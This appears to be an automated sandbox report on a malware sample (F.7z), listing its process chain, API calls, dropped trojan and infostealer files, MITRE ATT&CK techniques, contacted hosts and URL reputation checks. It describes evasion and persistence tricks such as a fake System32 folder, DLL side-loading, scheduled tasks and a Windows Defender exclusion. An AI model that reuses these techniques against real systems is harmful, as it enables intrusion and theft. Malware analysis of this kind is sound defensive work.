    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_64942A90 GetSystemTimeAsFileTime,46_2_64942A90
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CEF2860 GetUserNameA,GetLastError,_strdup,46_2_00007FFA2CEF2860
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
    Source: svchost.exe, 0000000E.00000002.2323835397.0000022F5ED02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
    Source: svchost.exe, 0000000E.00000002.2323835397.0000022F5ED02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
    Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA3312D7E0 bind,WSAGetLastError,51_2_00007FFA3312D7E0
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA330E78B0 memset,strncmp,strncmp,strchr,inet_pton,htons,strtoul,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,51_2_00007FFA330E78B0
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA330FC620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,51_2_00007FFA330FC620
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA3312D5B2 bind,WSAGetLastError,51_2_00007FFA3312D5B2
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA33126B0D htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,51_2_00007FFA33126B0D
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA33126B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,51_2_00007FFA33126B40
    MITRE ATT&CK Matrix (the number in front of a technique is the report's hit count for that technique):

    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | 112 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 112 Scripting | 1 DLL Side-Loading | 2 Disable or Modify Tools | OS Credential Dumping | 11 System Time Discovery | 1 Exploitation of Remote Services | 12 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
    Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 111 Windows Service | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 22 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 111 Windows Service | 11 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 12 File and Directory Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | 112 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Software Packing | NTDS | 34 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | 1 Scheduled Task/Job | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | 1 Service Execution | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    DNS | Web Services | External Remote Services | 2 PowerShell | Startup Items | Startup Items | 12 Masquerading | DCSync | 51 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 51 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Process Injection | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    Behavior Graph (ID: 1501605, Sample: F.7z, Startdate: 30/08/2024, Architecture: WINDOWS, Score: 100). The graph image is not reproduced here; the information recoverable from it:

    • Network: svchost.exe contacts worldtimeapi.org (213.188.196.246, port 80, TELIA-NORWAY-AS), universalsqlserver.privatelink.postgres.database.azure.com (20.71.50.126, port 5432, MICROSOFT-CORP-MSN-AS-BLOCK) and ipinfo.io (34.117.59.81, port 443, GOOGLE-AS-AP); 127.0.0.1 is also contacted
    • Process chain: wscript.exe → cmd.exe → printui.exe (dropped to C:\Windows \System32) → cmd.exe → powershell.exe and console_zero.exe → cmd.exe → schtasks.exe; reg.exe creates a Windows Service pointing to an executable in C:\Windows; svchost.exe → cmd.exe → powershell.exe (adds a directory exclusion to Windows Defender); svchost.exe → MpCmdRun.exe
    • Dropped files: C:\Windows\System32\zlib1.dll, C:\Windows\System32\x338625.dat, C:\Windows\System32\usvc.dat (all PE32+) plus 10 other files (8 malicious) written by printui.exe; C:\Windows \System32\x249569.dat and C:\Windows \System32\printui.exe (PE32+) written by the cmd.exe chain; C:\Users\user\AppData\Local\...\x249569.dat (PE32+)

    Source | Detection | Scanner | Label
    F.7z | 27% | ReversingLabs | Win32.Trojan.Malgent
    F.7z | 32% | Virustotal |

    Source | Detection | Scanner | Label
    C:\Windows\System32\x338625.dat | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat | 54% | ReversingLabs | Win64.Trojan.Malgent
    C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat | 42% | Virustotal |
    C:\Windows \System32\printui.exe | 0% | ReversingLabs |
    C:\Windows \System32\printui.exe | 0% | Virustotal |
    C:\Windows \System32\x249569.dat | 54% | ReversingLabs | Win64.Trojan.Malgent
    C:\Windows \System32\x249569.dat | 42% | Virustotal |
    C:\Windows\System32\console_zero.exe | 75% | ReversingLabs | Win64.Trojan.CrypterX
    C:\Windows\System32\console_zero.exe | 72% | Virustotal |
    C:\Windows\System32\libcrypto-3-x64.dll | 0% | ReversingLabs |
    C:\Windows\System32\libcrypto-3-x64.dll | 0% | Virustotal |
    C:\Windows\System32\libcurl.dll | 0% | ReversingLabs |
    C:\Windows\System32\libcurl.dll | 0% | Virustotal |
    C:\Windows\System32\libiconv-2.dll | 0% | ReversingLabs |
    C:\Windows\System32\libiconv-2.dll | 0% | Virustotal |
    C:\Windows\System32\libintl-9.dll | 0% | ReversingLabs |
    C:\Windows\System32\libintl-9.dll | 0% | Virustotal |
    C:\Windows\System32\libpq.dll | 0% | ReversingLabs |
    C:\Windows\System32\libpq.dll | 0% | Virustotal |
    C:\Windows\System32\libssl-3-x64.dll | 0% | ReversingLabs |
    C:\Windows\System32\libssl-3-x64.dll | 0% | Virustotal |
    C:\Windows\System32\libwinpthread-1.dll | 0% | ReversingLabs |
    C:\Windows\System32\libwinpthread-1.dll | 0% | Virustotal |
    C:\Windows\System32\ucrtbased.dll | 0% | ReversingLabs |
    C:\Windows\System32\ucrtbased.dll | 0% | Virustotal |
    C:\Windows\System32\usvc.dat | 96% | ReversingLabs | Win64.Trojan.Generic
    C:\Windows\System32\usvc.dat | 57% | Virustotal |
    C:\Windows\System32\vcruntime140d.dll | 0% | ReversingLabs |
    C:\Windows\System32\vcruntime140d.dll | 0% | Virustotal |
    C:\Windows\System32\x338625.dat | 79% | ReversingLabs | Win64.Infostealer.Tinba
    C:\Windows\System32\zlib1.dll | 0% | ReversingLabs |
    No Antivirus matches
Source | Detection | Scanner | Label
worldtimeapi.org | 0% | Virustotal |
ipinfo.io | 0% | Virustotal |
universalsqlserver.postgres.database.azure.com | 1% | Virustotal |
Source | Detection | Scanner | Label
https://dev.ditu.live.com/REST/v1/Routes/ | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/v1/Routes/Driving | 0% | URL Reputation | safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | 0% | URL Reputation | safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/v1/Routes/Walking | 0% | URL Reputation | safe
https://dev.ditu.live.com/mapcontrol/logging.ashx | 0% | URL Reputation | safe
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | 0% | URL Reputation | safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.bingmapsportal.com | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ | 0% | URL Reputation | safe
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | 0% | URL Reputation | safe
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/v1/Routes/ | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | 0% | URL Reputation | safe
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | 0% | URL Reputation | safe
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | 0% | URL Reputation | safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/v1/Locations | 0% | URL Reputation | safe
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | 0% | URL Reputation | safe
https://dev.virtualearth.net/mapcontrol/logging.ashx | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/Prod/C: | 0% | URL Reputation | safe
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | 0% | URL Reputation | safe
https://dynamic.t | 0% | URL Reputation | safe
http://www.zlib.net/D | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/v1/Routes/Transit | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://www.openssl.org/H | 0% | URL Reputation | safe
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | 0% | URL Reputation | safe
https://dev.ditu.live.com/REST/v1/Locations | 0% | URL Reputation | safe
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | 0% | URL Reputation | safe
https://curl.se/docs/alt-svc.html# | 0% | Avira URL Cloud | safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net | 0% | Avira URL Cloud | safe
https://curl.se/docs/hsts.html | 0% | Avira URL Cloud | safe
https://www.openssl.org/ | 0% | Avira URL Cloud | safe
https://curl.se/ | 0% | Avira URL Cloud | safe
https://curl.se/docs/hsts.html# | 0% | Avira URL Cloud | safe
https://ipinfo.io/json | 0% | Avira URL Cloud | safe
http://www.gnu.org/licenses/ | 0% | Avira URL Cloud | safe
https://curl.se/docs/hsts.html | 0% | Virustotal |
https://www.openssl.org/ | 0% | Virustotal |
https://curl.se/docs/http-cookies.html | 0% | Virustotal |
https://curl.se/docs/http-cookies.html | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://curl.se/ | 0% | Virustotal |
https://curl.se/docs/hsts.html# | 0% | Virustotal |
https://www.gnu.org/licenses/ | 0% | Avira URL Cloud | safe
https://curl.se/docs/alt-svc.html# | 0% | Virustotal |
http://crl.ver) | 0% | Avira URL Cloud | safe
http://www.gnu.org/licenses/ | 0% | Virustotal |
https://g.live.com/odclientsettings/ProdV2/C: | 0% | Avira URL Cloud | safe
https://ipinfo.io/json | 0% | Virustotal |
https://curl.se/docs/alt-svc.html | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://curl.se/docs/copyright.htmlD | 0% | Avira URL Cloud | safe
https://www.gnu.org/licenses/ | 0% | Virustotal |
http://worldtimeapi.org/api/timezone/Etc/UTCnB | 0% | Avira URL Cloud | safe
https://g.live.com/odclientsettings/ProdV2/C: | 0% | Virustotal |
http://www.zlib.net/ | 0% | Avira URL Cloud | safe
https://curl.se/docs/alt-svc.html | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
http://mingw-w64.sourceforge.net/X | 0% | Avira URL Cloud | safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net | 0% | Virustotal |
https://curl.se/docs/copyright.html | 0% | Avira URL Cloud | safe
http://worldtimeapi.org/api/timezone/Etc/UTC | 0% | Avira URL Cloud | safe
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | 0% | Avira URL Cloud | safe
http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain; | 0% | Avira URL Cloud | safe
https://curl.se/docs/copyright.htmlD | 0% | Virustotal |
http://mingw-w64.sourceforge.net/X | 0% | Virustotal |
https://curl.se/docs/http-cookies.html# | 0% | Avira URL Cloud | safe
https://curl.se/V | 0% | Avira URL Cloud | safe
http://www.zlib.net/ | 0% | Virustotal |
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | 0% | Avira URL Cloud | safe
https://curl.se/docs/http-cookies.html# | 0% | Virustotal |
http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain; | 0% | Virustotal |
https://curl.se/docs/copyright.html | 0% | Virustotal |
https://curl.se/V | 0% | Virustotal |
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | 0% | Virustotal |
http://worldtimeapi.org/api/timezone/Etc/UTC | 0% | Virustotal |
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
worldtimeapi.org | 213.188.196.246 | true | false | | unknown
ipinfo.io | 34.117.59.81 | true | false | | unknown
universalsqlserver.privatelink.postgres.database.azure.com | 20.71.50.126 | true | false | | unknown
universalsqlserver.postgres.database.azure.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://worldtimeapi.org/api/timezone/Etc/UTC | false | 0% Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net | svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.openssl.org/ | svchost.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://curl.se/docs/hsts.html | console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://curl.se/docs/alt-svc.html# | console_zero.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://curl.se/ | console_zero.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://curl.se/docs/hsts.html# | console_zero.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
